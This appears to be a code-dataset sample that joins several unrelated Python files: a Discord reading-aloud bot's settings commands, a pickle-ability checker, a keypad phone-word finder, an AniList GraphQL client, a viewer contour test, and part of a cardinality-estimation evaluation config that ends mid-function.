                       f"名前を読み上げるか: {self.bot.guild_setting[ctx.guild.id]['name']}\n"
                       f"絵文字を読み上げるか: {self.bot.guild_setting[ctx.guild.id]['emoji']}\n"
                       f"読み上げ上限文字数: {self.bot.guild_setting[ctx.guild.id]['limit']}文字\n"
                       f"再接続するか: {self.bot.guild_setting[ctx.guild.id]['keep']}")
        return
    @setting.command()
    async def bot(self, ctx):
        # Toggle whether bot-authored messages are read aloud; `r` holds the
        # previous value, which is flipped, persisted and re-cached.
        r = await self.bot.db.get_guild_setting('bot', ctx.guild.id)
        await self.bot.db.set_guild_setting('bot', ctx.guild.id, not r)
        await self.bot.update_guild_setting(ctx.guild.id)
        await ctx.send(f'botのメッセージを読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
    @setting.command()
    async def name(self, ctx):
        # Toggle whether the speaker's name is announced before each message.
        r = await self.bot.db.get_guild_setting('name', ctx.guild.id)
        await self.bot.db.set_guild_setting('name', ctx.guild.id, not r)
        await self.bot.update_guild_setting(ctx.guild.id)
        await ctx.send(f'名前を読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
    @setting.command()
    async def emoji(self, ctx):
        # Toggle whether emoji are read aloud.
        r = await self.bot.db.get_guild_setting('emoji', ctx.guild.id)
        await self.bot.db.set_guild_setting('emoji', ctx.guild.id, not r)
        await self.bot.update_guild_setting(ctx.guild.id)
        await ctx.send(f'絵文字を読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
    @setting.command()
    async def limit(self, ctx, limit: int):
        # Cap on characters read per message; 1..2000 (Discord's own limit).
        if limit <= 0 or limit > 2000:
            await ctx.send('その値は指定できません。')
            return
        # `set_limit` appears to return the previous value -- confirm against
        # the db implementation.
        r = await self.bot.db.set_limit(ctx.guild.id, limit)
        await self.bot.update_guild_setting(ctx.guild.id)
        await ctx.send(f'最大読み上げ文字数を{r}から{limit}に変更しました。')
    @setting.command(name="keep-alive")
    async def keep_alive(self, ctx):
        # Toggle auto-reconnect ("keep") for the voice session.
        # NOTE(review): unlike the sibling toggles, no confirmation message
        # is sent to the channel here -- possibly an omission.
        r = await self.bot.db.get_guild_setting('keep', ctx.guild.id)
        await self.bot.db.set_guild_setting('keep', ctx.guild.id, not r)
        await self.bot.update_guild_setting(ctx.guild.id)
def setup(bot):
    # discord.py extension hook: instantiate the cog and register it.
    cog = VoiceSetting(bot)
    return bot.add_cog(cog)
| StarcoderdataPython |
8095714 | # flake8: noqa
from __future__ import annotations
def check_pickle(xThing, lTested=None):
    # https://stackoverflow.com/a/50049341/545637
    """Recursively probe *xThing* and its public attributes for picklability.

    Walks dicts, lists, iterables and attribute ``__dict__``s, calling
    ``pickle.dumps`` on every leaf so that the traceback pinpoints exactly
    which member of a compound object cannot be pickled. Progress is
    printed along the way.

    :param xThing: object to probe
    :param lTested: accumulator of ``id()`` values already visited (cycle
        guard); a fresh list is created when ``None``
    :return: the accumulator list of visited object ids
    """
    import pickle
    lTested = [] if lTested is None else lTested
    if id(xThing) in lTested:
        return lTested
    sType = type(xThing).__name__
    print('Testing {0}...'.format(sType))
    # Primitives always pickle -- no need to recurse or record them.
    if sType in ['type', 'int', 'str', 'bool', 'NoneType', 'unicode']:
        print('...too easy')
        return lTested
    if sType == 'dict':
        print('...testing members')
        for k in xThing:
            lTested = check_pickle(xThing[k], lTested)
        print('...tested members')
        return lTested
    if sType == 'list':
        print('...testing members')
        for x in xThing:
            # BUGFIX: the original called check_pickle(x) without the
            # accumulator, resetting the visited set for every element.
            lTested = check_pickle(x, lTested)
        print('...tested members')
        return lTested
    lTested.append(id(xThing))
    oClass = type(xThing)
    for s in dir(xThing):
        if s.startswith('_'):
            print('...skipping *private* thingy')
            continue
        # Skip class-level properties: reading them runs arbitrary code.
        try:
            xClassAttribute = oClass.__getattribute__(oClass, s)
        except (AttributeError, TypeError):
            pass
        else:
            if type(xClassAttribute).__name__ == 'property':
                print('...skipping property')
                continue
        xAttribute = xThing.__getattribute__(s)
        print('Testing {0}.{1} of type {2}'.format(sType, s, type(xAttribute).__name__))
        if type(xAttribute).__name__ == 'function':
            print("...skipping function")
            continue
        if type(xAttribute).__name__ in ['method', 'instancemethod']:
            print('...skipping method')
            continue
        if type(xAttribute).__name__ == 'HtmlElement':
            # lxml elements are known troublemakers; skip them entirely.
            continue
        if type(xAttribute) == dict:
            print('...testing dict values for {0}.{1}'.format(sType, s))
            for k in xAttribute:
                # BUGFIX: thread the accumulator through the recursion
                # (was check_pickle(xAttribute[k]) with a fresh list).
                lTested = check_pickle(xAttribute[k], lTested)
            # BUGFIX: this print was unreachable (placed after `continue`).
            print('...finished testing dict values for {0}.{1}'.format(sType, s))
            continue
        try:
            oIter = xAttribute.__iter__()
        except (AttributeError, TypeError):
            pass
        except AssertionError:
            pass  # lxml elements do this
        else:
            print('...testing iter values for {0}.{1} of type {2}'.format(sType, s, type(xAttribute).__name__))
            for x in xAttribute:
                lTested = check_pickle(x, lTested)
            print('...finished testing iter values for {0}.{1}'.format(sType, s))
        try:
            xAttribute.__dict__
        except AttributeError:
            pass
        else:
            # Composite attribute: explore it separately.
            lTested = check_pickle(xAttribute, lTested)
            continue
        print(0, xThing, xAttribute)
        pickle.dumps(xAttribute)
    print('Testing {0} as complete object'.format(sType))
    pickle.dumps(xThing)
    return lTested
| StarcoderdataPython |
3202695 | import time
from functools import lru_cache
from trie import PrefixTree
class NumberConverter(object):
    """Finds dictionary words that spell a given phone number on a keypad.

    Words are matched against a prefix trie loaded from ``words_en.txt``.
    Digits 0 and 1 carry no letters and are rejected.
    """

    # Phone keypad layout: digit -> candidate letters.
    _KEYMAP = {'2': ['a', 'b', 'c'],
               '3': ['d', 'e', 'f'],
               '4': ['g', 'h', 'i'],
               '5': ['j', 'k', 'l'],
               '6': ['m', 'n', 'o'],
               '7': ['p', 'q', 'r', 's'],
               '8': ['t', 'u', 'v'],
               '9': ['w', 'x', 'y', 'z']}
    # Inverse mapping as a str.translate table: one C-level pass per word
    # instead of 26 chained str.replace calls. This also removes the
    # original's lru_cache on an instance method, which keeps every
    # instance alive for the cache's lifetime (flake8-bugbear B019).
    _CHAR_TO_DIGIT = str.maketrans(
        {char: digit for digit, chars in _KEYMAP.items() for char in chars})

    def __init__(self):
        """Load the English word list into the prefix trie."""
        self.trie = PrefixTree()
        with open('words_en.txt') as file:
            for line in file:
                self.trie.insert(line.rstrip('\n'))

    def number_to_valid_phone_words(self, num):
        """Return all dictionary words whose keypad digits equal *num*.

        :param num: digit string containing only the digits 2-9
        :raises Exception: if *num* contains 0 or 1
        """
        if '1' in num or '0' in num:
            raise Exception('Numbers with 1 and 0 are currently not supported.')
        # 1: collect every word of the right length starting with a letter
        #    that maps to the first digit.
        candidates = []
        for prefix in self.num_to_chars(num[0]):
            candidates.extend(self.trie.starts_with(prefix, len(num)))
        # 2/3: keep only words whose full digit translation matches num.
        return [word for word in candidates
                if self.words_to_nums(word) == num]

    @staticmethod
    def num_to_chars(num):
        """Letters on keypad key *num* ('2'-'9'), or None for other keys."""
        chars = NumberConverter._KEYMAP.get(num)
        # Return a copy so callers cannot mutate the shared class table.
        return list(chars) if chars is not None else None

    def words_to_nums(self, word):
        """Translate a lowercase word into its keypad digits, e.g. 'cat' -> '228'."""
        return word.translate(self._CHAR_TO_DIGIT)
# Demo / micro-benchmark: build the trie-backed converter once, then time
# two identical passes over the same numbers to compare cold vs. repeated
# lookups (times reported in milliseconds).
converter = NumberConverter()
print('****First Run****')
for n in ['228', '888', '2382']:
    start = time.time()
    print(n, converter.number_to_valid_phone_words(n))
    end = time.time()
    print('Processing time in milliseconds:', int((end - start) * 1000))
print('****Second Run****')
for n in ['228', '888', '2382']:
    start = time.time()
    print(n, converter.number_to_valid_phone_words(n))
    end = time.time()
    print('Processing time in milliseconds:', int((end - start) * 1000))
| StarcoderdataPython |
1812996 | <filename>miku/http.py
import asyncio
from typing import Any, Dict, Union
import aiohttp
from .query import Query, QueryFields, QueryOperation
from .fields import *
from .media import Anime, Manga, Media
from .character import Character
from .paginator import Paginator
from .user import User
from .image import Image
from .errors import AniListServerError, HTTPException, mapping
__all__ = (
'HTTPHandler',
)
class HTTPHandler:
    """Issues GraphQL requests against the AniList API and builds the
    queries for the library's lookup and pagination helpers.

    Retries transient server errors, honours rate limits, and maps API
    error payloads onto the library's exception hierarchy.
    """

    URL = 'https://graphql.anilist.co'

    def __init__(self, loop: asyncio.AbstractEventLoop, session: aiohttp.ClientSession=None) -> None:
        # BUGFIX: the original raised whenever *any* session was supplied
        # (`if session:`), although the message shows an isinstance check
        # was intended. Now only a wrongly-typed session is rejected.
        if session is not None and not isinstance(session, aiohttp.ClientSession):
            ret = 'Expected an aiohttp.ClientSession instance but got {0.__class__.__name__!r} instead'
            raise TypeError(ret.format(session))
        self.session = session
        self.loop = loop
        self.token = None  # bearer token, set externally after OAuth

    def parse_args(self, id: Union[int, str]):
        """Build (operation variables, request variables, field arguments)
        for a lookup by numeric id or by search string."""
        operation_variables = {}
        variables = {}
        arguments = {}
        if isinstance(id, str):
            operation_variables['$search'] = 'String'
            arguments['search'] = '$search'
            variables['search'] = id
        else:
            operation_variables['$id'] = 'Int'
            arguments['id'] = '$id'
            variables['id'] = id
        return operation_variables, variables, arguments

    async def create_session(self):
        """Lazily create and memoize the aiohttp client session."""
        self.session = session = aiohttp.ClientSession(loop=self.loop)
        return session

    async def get_access_token_from_pin(self, pin: str, client_id: str, client_secret: str) -> str:
        """Exchange an OAuth authorization pin for an access token."""
        json = {
            'grant_type': 'authorization_code',
            'client_id': client_id,
            'client_secret': client_secret,
            'code': pin,
        }
        if not self.session:
            self.session = await self.create_session()
        async with self.session.post('https://anilist.co/api/v2/oauth/token', json=json) as response:
            data = await response.json()
        return data['access_token']

    async def request(self, query: str, variables: Dict[str, Any]):
        """POST the GraphQL payload and return the decoded JSON.

        Retries up to 5 times: backs off linearly on HTTP 500 and honours
        Retry-After on HTTP 429. Raises a mapped exception (or
        :class:`HTTPException`) when the API reports errors, and
        :class:`AniListServerError` when all retries are exhausted.
        """
        headers = {
            'Content-Type': 'application/json',
            'Accept': 'application/json',
        }
        if self.token:
            headers['Authorization'] = 'Bearer ' + self.token
        url = self.URL
        session = self.session
        if not session:
            session = await self.create_session()
        payload = {
            'query': query,
            'variables': variables
        }
        for retry in range(5):
            # BUGFIX: `data` was unbound when the body was not JSON,
            # turning a ContentTypeError into a NameError below.
            data = None
            async with session.post(url, json=payload, headers=headers) as response:
                try:
                    data = await response.json()
                except aiohttp.ContentTypeError:
                    pass
                if response.status == 500:
                    await asyncio.sleep(retry * 2)
                    continue
                if response.status == 429:
                    retry_after = response.headers['Retry-After']
                    await asyncio.sleep(int(retry_after))
                    continue
                if data and data.get('errors'):
                    cls = mapping.get(data['errors'][0]['status'], HTTPException)
                    raise cls(data)
                return data
        raise AniListServerError('Internal server error')

    async def close(self):
        """Close the underlying session, if one was ever created."""
        if not self.session:
            return None
        return await self.session.close()

    async def get_thread_from_user_id(self, user_id: int):
        """Fetch a thread by its author's user id."""
        operation = QueryOperation(
            type="query",
            variables={"$userId": "Int"}
        )
        fields = QueryFields("Thread", userId='$userId')
        for field in THREAD_FIELDS:
            fields.add_field(field)
        query = Query(operation, fields).build()
        variables = {
            'userId': user_id,
        }
        return await self.request(query, variables)

    async def get_thread(self, id: Union[str, int]):
        """Fetch a thread by numeric id or search string."""
        operation_variables, variables, arguments = self.parse_args(id)
        operation = QueryOperation(
            type="query",
            variables=operation_variables
        )
        fields = QueryFields("Thread", **arguments)
        for field in THREAD_FIELDS:
            fields.add_field(field)
        query = Query(operation, fields).build()
        return await self.request(query, variables)

    async def get_thread_comments(self, id: int):
        """Fetch the comments of a thread by thread id."""
        operation_variables, variables, arguments = self.parse_args(id)
        operation = QueryOperation(
            type="query",
            variables=operation_variables
        )
        fields = QueryFields("ThreadComment", **arguments)
        for field in COMMENT_FIELDS:
            fields.add_field(field)
        query = Query(operation, fields).build()
        return await self.request(query, variables)

    async def get_user(self, search: str):
        """Fetch a single user by name."""
        operation = QueryOperation(
            type="query",
            variables={"$search": "String"}
        )
        fields = QueryFields("User", search='$search')
        for field in USER_FIELDS:
            fields.add_field(field)
        query = Query(operation, fields).build()
        variables = {
            'search': search,
        }
        return await self.request(query, variables)

    async def get_media(self, search: str, type: str=None):
        """Fetch a single media entry by name; *type* ('ANIME'/'MANGA')
        optionally narrows the search."""
        operation = QueryOperation(
            type="query",
            variables={"$search": "String"}
        )
        fields = QueryFields("Media", search='$search')
        if type:
            fields.arguments['type'] = type
        for field in ANIME_FIELDS:
            fields.add_field(field)
        fields.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
        fields.add_field('studios', 'nodes {' + ' '.join(STUDIO_FIELDS) + ' }')
        query = Query(operation, fields).build()
        variables = {
            'search': search,
        }
        return await self.request(query, variables)

    async def get_anime(self, search: str):
        """Fetch a single anime by name."""
        return await self.get_media(search, 'ANIME')

    async def get_manga(self, search: str):
        """Fetch a single manga by name."""
        return await self.get_media(search, 'MANGA')

    async def get_studio(self, search: str):
        """Fetch a studio by name, including its media."""
        operation = QueryOperation(
            type="query",
            variables={"$search": "String"}
        )
        fields = QueryFields("Studio", search='$search')
        for field in STUDIO_FIELDS:
            fields.add_field(field)
        fields.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
        query = Query(operation, fields).build()
        variables = {
            'search': search,
        }
        return await self.request(query, variables)

    async def get_staff(self, search: str):
        """Fetch a staff member by name, including their characters."""
        operation = QueryOperation(
            type="query",
            variables={"$search": "String"}
        )
        fields = QueryFields("Staff", search='$search')
        for field in STAFF_FIELDS:
            fields.add_field(field)
        fields.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
        query = Query(operation, fields).build()
        variables = {
            'search': search,
        }
        return await self.request(query, variables)

    async def get_site_statisics(self):
        """Fetch AniList site statistics.

        The misspelled name ('statisics') is kept: it is part of the
        public interface and callers depend on it.
        """
        operation = QueryOperation(
            type='query',
            variables={}
        )
        fields = QueryFields('SiteStatistics')
        for field in SITE_STATISTICS_FIELDS:
            fields.add_field(field)
        query = Query(operation, fields).build()
        return await self.request(query, {})

    def get_users(self, search: str, *, per_page: int=5, page: int=0):
        """Paginated user search; returns a :class:`Paginator` of User."""
        operation = QueryOperation(
            type="query",
            variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
        )
        fields = QueryFields("Page", page="$page", perPage="$perPage")
        fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
        fields.add_field('users', *USER_FIELDS, search='$search')
        query = Query(operation, fields).build()
        variables = {
            'search': search,
            'page': page,
            'perPage': per_page
        }
        return Paginator(self, 'users', query, variables, User)

    def get_medias(self, search: str, type: str=None, *, per_page: int=5, page: int=0):
        """Paginated media search; wraps results in Anime/Manga/Media
        according to *type*."""
        operation = QueryOperation(
            type="query",
            variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
        )
        fields = QueryFields("Page", page="$page", perPage="$perPage")
        fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
        field = fields.add_field("media", *ANIME_FIELDS, search='$search')
        if type:
            field.arguments['type'] = type
        field.add_field('characters', 'nodes {' + ' '.join(CHARACTER_FIELDS) + ' }')
        query = Query(operation=operation, fields=fields).build()
        variables = {
            'search': search,
            'page': page,
            'perPage': per_page
        }
        # BUGFIX: the original initialised cls = Media and then immediately
        # overwrote it, falling through to Manga for *any* non-ANIME type --
        # so an untyped search wrapped all results in Manga.
        if type == 'ANIME':
            cls = Anime
        elif type == 'MANGA':
            cls = Manga
        else:
            cls = Media
        return Paginator(self, 'media', query, variables, cls)

    def get_animes(self, search: str, *, per_page: int=5, page: int=0):
        """Paginated anime search."""
        return self.get_medias(search, 'ANIME', per_page=per_page, page=page)

    def get_mangas(self, search: str, *, per_page: int=5, page: int=0):
        """Paginated manga search."""
        return self.get_medias(search, 'MANGA', per_page=per_page, page=page)

    def get_characters(self, search: str, *, per_page: int=5, page: int=0):
        """Paginated character search; returns a Paginator of Character."""
        operation = QueryOperation(
            type="query",
            variables={"$page": "Int", "$perPage": "Int", "$search": "String"}
        )
        fields = QueryFields("Page", page="$page", perPage="$perPage")
        fields.add_field("pageInfo", "total", "currentPage", "lastPage", "hasNextPage", "perPage")
        field = fields.add_field("characters", *CHARACTER_FIELDS, search='$search')
        field.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
        query = Query(operation=operation, fields=fields).build()
        variables = {
            'search': search,
            'page': page,
            'perPage': per_page
        }
        return Paginator(self, 'characters', query, variables, Character)

    async def get_character(self, search: str):
        """Fetch a single character by name, including their media."""
        operation = QueryOperation(
            type="query",
            variables={"$search": "String"}
        )
        fields = QueryFields("Character", search='$search')
        for field in CHARACTER_FIELDS:
            fields.add_field(field)
        fields.add_field('media', 'nodes {' + ' '.join(ANIME_FIELDS) + ' }')
        query = Query(operation, fields).build()
        variables = {
            'search': search,
        }
        return await self.request(query, variables)
def test_contour_levels(app, data_image):
    # Custom contour level text must round-trip through the layer state.
    viewer = app.imshow(data=data_image)
    panel = viewer._layout_layer_options.layers[0]['layer_panel']
    state = panel.layer_state
    state.level_mode = "Custom"
    # Scientific notation and duplicate values are accepted verbatim.
    panel.c_levels_txt = '1e2, 1e3, 0.1, .1'
    assert state.levels == [100, 1000, 0.1, 0.1]
    assert panel.c_levels_txt == '1e2, 1e3, 0.1, .1'
    # Setting the levels programmatically regenerates the text field.
    state.levels = [10, 100]
    assert panel.c_levels_txt == '10, 100'
| StarcoderdataPython |
1771662 | # Copyright 2020 The Private Cardinality Estimation Framework Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluation configurations."""
import itertools
import math
import numpy as np
from wfa_cardinality_estimation_evaluation_framework.estimators import bloom_filter_sketch_operators
from wfa_cardinality_estimation_evaluation_framework.estimators import bloom_filters
from wfa_cardinality_estimation_evaluation_framework.estimators import estimator_noisers
from wfa_cardinality_estimation_evaluation_framework.estimators import exact_set
from wfa_cardinality_estimation_evaluation_framework.estimators import hyper_log_log
from wfa_cardinality_estimation_evaluation_framework.estimators import independent_set_estimator
from wfa_cardinality_estimation_evaluation_framework.estimators import liquid_legions
from wfa_cardinality_estimation_evaluation_framework.estimators import meta_estimators
from wfa_cardinality_estimation_evaluation_framework.estimators import same_key_aggregator
from wfa_cardinality_estimation_evaluation_framework.estimators import stratified_sketch
from wfa_cardinality_estimation_evaluation_framework.estimators import vector_of_counts
from wfa_cardinality_estimation_evaluation_framework.estimators import vector_of_counts_sketch_operator
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import EvaluationConfig
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import ScenarioConfig
from wfa_cardinality_estimation_evaluation_framework.evaluations.configs import SketchEstimatorConfig
from wfa_cardinality_estimation_evaluation_framework.simulations import frequency_set_generator
from wfa_cardinality_estimation_evaluation_framework.simulations import set_generator
# Field labels for the components of a SketchEstimatorConfig name.
SKETCH = 'sketch'
SKETCH_CONFIG = 'sketch_config'
SKETCH_EPSILON = 'sketch_epsilon'
ESTIMATOR = 'estimator'
ESTIMATE_EPSILON = 'estimate_epsilon'
MAX_FREQUENCY = 'max_frequency'
# The dash-separated field order used when constructing config names
# (see construct_sketch_estimator_config_name).
SKETCH_ESTIMATOR_CONFIG_NAMES_FORMAT = (
    SKETCH, SKETCH_CONFIG, ESTIMATOR, SKETCH_EPSILON, ESTIMATE_EPSILON,
    MAX_FREQUENCY)
# Default number of runs per scenario and default population sizes.
NUM_RUNS_VALUE = 100
SMOKE_TEST_UNIVERSE_SIZE = 200_000
UNIVERSE_SIZE_VALUE = 1_000_000
NUM_SETS_VALUE = 20
# Smoke test reach percent.
SMALL_REACH_RATE_SMOKE_TEST = 0.1
LARGE_REACH_RATE_SMOKE_TEST = 0.2
# Complete reach estimator evaluation reach percent.
SMALL_REACH_RATE_VALUE = 0.01
LARGE_REACH_RATE_VALUE = 0.2
# Global DP stress test.
US_INTERNET_POPULATION = 2_000_000_000
REACH_STRESS_TEST = [1_000, 10_000, 100_000, 1_000_000, 10_000_000]
# Frequency test reach percent.
REACH_RATE_FREQ_END_TO_END_TEST = 0.1
REACH_RATE_FREQ_SMOKE_TEST = 0.1
# Shared proportions swept in the sequentially-correlated scenarios, and the
# remarketing-list fraction of the universe in the remarketing scenario.
SHARED_PROP_LIST_VALUE = (0.25, 0.5, 0.75)
REMARKETING_RATE_VALUE = 0.2
# Sizes used by the frequency evaluations.
NUM_SETS_VALUE_FREQ = 10
SET_SIZE_FOR_FREQ = 20_000
FREQ_UNIVERSE_SIZE = 200_000
# String tokens used when formatting privacy parameters into config names.
NO_GLOBAL_DP_STR = 'no_global_dp'
GLOBAL_DP_STR = 'global_dp'
NO_LOCAL_DP_STR = 'no_local_dp'
LOCAL_DP_STR = 'local_dp'
GEOMETRIC_NOISE = 'geometric_noise'
GAUSSIAN_NOISE = 'gaussian_noise'
# The None in the epsilon value is used to tell the sketch estimator constructor
# that we do not want to noise the sketch.
SKETCH_EPSILON_VALUES = (math.log(3), math.log(3) / 4, math.log(3) / 10, None)
# The current simulator module add noise to the estimated cardinality so as to
# mimic the global differential privacy use case. In the real world, the
# implementation could be different and more complicated.
# As such, we use a small epsilon so as to be conservative on the result.
ESTIMATE_EPSILON_VALUES = (math.log(3), None)
# Epsilon values swept by the global-DP limit test, ln(3) scaled down by up to
# a factor of 10000.
GLOBAL_DP_LIMIT_TEST_EPSILON_VALUES = [
    math.log(3) / x for x in [
        1, 2, 4, 10, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000,
        2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000]
]
# When we would like to split budget over multiple queries, having delta greater
# than zero is often helpful in allowing us to use smaller amount of noise.
ESTIMATE_EPSILON_DELTA_VALUES = [
    (math.log(3), 1e-5), (math.log(3), 1e-6), (math.log(3), 1e-7), (None, None)
]
# The number of estimate queries for which the budget will be split over.
NUM_ESTIMATE_QUERIES_VALUES = [
    1, 2, 4, 10, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1_000, 2_000,
    3_000, 4_000, 5_000, 6_000, 7_000, 8_000, 9_000, 10_000, 50_000, 100_000,
    500_000, 1_000_000
]
# The number of decimal points to keep of the epsilon part of the
# SketchEstimatorConfig name.
EPSILON_DECIMALS = 4
EPSILON_DECIMALS_LIMIT_TEST = 8
# The number of decimal points to keep of the delta part of the
# SketchEstimatorConfig name.
DELTA_DECIMALS = 7
# The length of the Any Distribution Bloom Filters.
# We use the np.array with dtype so as to make sure that the lengths are all
# integers.
ADBF_LENGTH_LIST = np.array([100_000, 250_000], dtype=np.int64)
EXP_ADBF_DECAY_RATE = 10
STRATIFIED_EXP_ADBF_EPSILON_SPLIT = 0.5
# Sketch-union operator variants.
SKETCH_OPERATOR_EXPECTATION = 'expectation'
SKETCH_OPERATOR_BAYESIAN = 'bayesian'
SKETCH_OPERATOR_LIST = [SKETCH_OPERATOR_EXPECTATION, SKETCH_OPERATOR_BAYESIAN]
GEO_LENGTH_PROB_PRODUCT = 2
# The length of the bloom filters.
BLOOM_FILTERS_LENGTH_LIST = np.array([5_000_000], dtype=np.int64)
VOC_LENGTH_LIST = np.array([1024, 4096], dtype=np.int64)
# Document the evaluation configurations.
def _smoke_test(num_runs=NUM_RUNS_VALUE,
                universe_size=SMOKE_TEST_UNIVERSE_SIZE):
  """Smoke test evaluation configurations.

  We set the smoke test parameters according to Appendix 3: Example
  Parameters of Scenarios of the Cardinality and Frequency Estimation
  Evaluation Framework.

  Args:
    num_runs: the number of runs per scenario.
    universe_size: the size of universe.

  Returns:
    An EvaluationConfig covering the five smoke-test reach scenarios.
  """
  large_reach = int(universe_size * LARGE_REACH_RATE_SMOKE_TEST)
  small_reach = int(universe_size * SMALL_REACH_RATE_SMOKE_TEST)

  def _seq_corr_scenario(scenario_name, correlated_sets):
    # The two sequentially-correlated scenarios differ only in which sets
    # each new set correlates with.
    return ScenarioConfig(
        name=scenario_name,
        set_generator_factory=(
            set_generator.SequentiallyCorrelatedSetGenerator
            .get_generator_factory_with_num_and_size(
                order=set_generator.ORDER_ORIGINAL,
                correlated_sets=correlated_sets,
                num_sets=20, set_size=small_reach,
                shared_prop=0.5)))

  scenarios = [
      ScenarioConfig(
          name='independent',
          set_generator_factory=(
              set_generator.IndependentSetGenerator
              .get_generator_factory_with_num_and_size(
                  universe_size=universe_size, num_sets=20,
                  set_size=large_reach))),
      ScenarioConfig(
          name='remarketing',
          set_generator_factory=(
              set_generator.IndependentSetGenerator
              .get_generator_factory_with_num_and_size(
                  universe_size=int(universe_size * REMARKETING_RATE_VALUE),
                  num_sets=20, set_size=large_reach))),
      ScenarioConfig(
          name='fully_overlapping',
          set_generator_factory=(
              set_generator.FullyOverlapSetGenerator
              .get_generator_factory_with_num_and_size(
                  universe_size=universe_size, num_sets=20,
                  set_size=large_reach))),
      _seq_corr_scenario('sequentially_correlated_all',
                         set_generator.CORRELATED_SETS_ALL),
      _seq_corr_scenario('sequentially_correlated_one',
                         set_generator.CORRELATED_SETS_ONE),
  ]
  return EvaluationConfig(
      name='smoke_test',
      num_runs=num_runs,
      scenario_config_list=tuple(scenarios))
def _frequency_smoke_test(num_runs=NUM_RUNS_VALUE,
                          universe_size=FREQ_UNIVERSE_SIZE):
  """Smoke test frequency evaluation configurations.

  Args:
    num_runs: the number of runs per scenario.
    universe_size: the size of the universe.

  Returns:
    An EvaluationConfig with the three frequency smoke-test scenarios.
  """
  set_size = int(universe_size * REACH_RATE_FREQ_SMOKE_TEST)
  homogeneous = ScenarioConfig(
      name='homogeneous',
      set_generator_factory=(
          frequency_set_generator.HomogeneousMultiSetGenerator
          .get_generator_factory_with_num_and_size(
              universe_size=universe_size, num_sets=10,
              set_size=set_size, freq_rates=[1] * 10, freq_cap=3)))
  heterogeneous = ScenarioConfig(
      name='heterogeneous',
      set_generator_factory=(
          frequency_set_generator.HeterogeneousMultiSetGenerator
          .get_generator_factory_with_num_and_size(
              universe_size=universe_size, num_sets=10,
              set_size=set_size, gamma_params=[[1, 1]] * 10,
              freq_cap=3)))
  publisher_constant = ScenarioConfig(
      name='publisher_constant',
      set_generator_factory=(
          frequency_set_generator.PublisherConstantFrequencySetGenerator
          .get_generator_factory_with_num_and_size(
              universe_size=universe_size, num_sets=10,
              set_size=set_size, frequency=3)))
  return EvaluationConfig(
      name='frequency_smoke_test',
      num_runs=num_runs,
      scenario_config_list=(homogeneous, heterogeneous, publisher_constant))
def _get_default_name_to_choices_of_set_size_list(
small_set_size,
large_set_size,
num_sets
):
return {
'all_small': [small_set_size] * num_sets,
'all_large': [large_set_size] * num_sets,
'1st_small_then_large': (
[small_set_size] + [large_set_size] * (num_sets - 1)),
'1st_half_small_2nd_half_large': (
[small_set_size] * int(num_sets / 2) +
[large_set_size] * (num_sets - int(num_sets / 2))),
'small_then_last_large': (
[small_set_size] * (num_sets - 1) + [large_set_size]),
'gradually_smaller': [
int(large_set_size / np.sqrt(i + 1)) for i in range(num_sets)]
}
def _generate_configs_scenario_1_2(universe_size, num_sets, small_set_size,
                                   large_set_size, remarketing_rate=None):
  """Generate configs of Scenario 1 & 2.

  Both scenarios draw each publisher's set independently (via
  set_generator.IndependentSetGenerator). If remarketing_rate is not
  provided, this is scenario 1 with universe_size as the total pool.
  Otherwise, this is scenario 2, where sets are drawn from a remarketing
  list of size int(universe_size * remarketing_rate).

  See scenario 1 / 2:
  Independent m-publishers / n-publishers independently serve a remarketing list
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-1-independence-m-publishers-with-homogeneous-user-reach-probability

  Args:
    universe_size: the size of the pool from which the IDs will be selected.
    num_sets: the number of sets.
    small_set_size: the reach of the small reach sets.
    large_set_size: the reach of the large reach sets.
    remarketing_rate: optional fraction of the universe forming the
      remarketing list; None selects scenario 1.

  Returns:
    A list of ScenarioConfigs of scenario 1 / 2 with selected parameters.
  """
  name_to_choices_of_set_size_list = _get_default_name_to_choices_of_set_size_list(
      small_set_size, large_set_size, num_sets
  )
  scenario_config_list = []
  if remarketing_rate is None:
    key_words = ['independent']
    size = universe_size
  else:
    size = int(universe_size * remarketing_rate)
    key_words = ['remarketing', 'remarketing_size:' + str(size)]
  for set_type, set_size_list in name_to_choices_of_set_size_list.items():
    scenario_config_list.append(
        ScenarioConfig(
            name='-'.join(key_words + [
                'universe_size:' + str(universe_size),
                'small_set:' + str(small_set_size),
                'large_set:' + str(large_set_size),
                'set_type:' + set_type]),
            set_generator_factory=(
                set_generator.IndependentSetGenerator
                .get_generator_factory_with_set_size_list(
                    universe_size=size,
                    set_size_list=set_size_list)))
    )
  return scenario_config_list
def _generate_configs_scenario_3(universe_size, num_sets, small_set_size,
                                 large_set_size, user_activity_assciation):
  """Generate configs of Scenario 3(a/b).

  In this scenario, publishers have heterogeneous users reach probability,
  modeled by the Exponential Bow set generator.

  See scenario 3 [m-publishers with heterogeneous users reach probability]:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-3-m-publishers-with-heterogeneous-users-reach-probability

  Args:
    universe_size: the size of the pools from which the IDs will be selected.
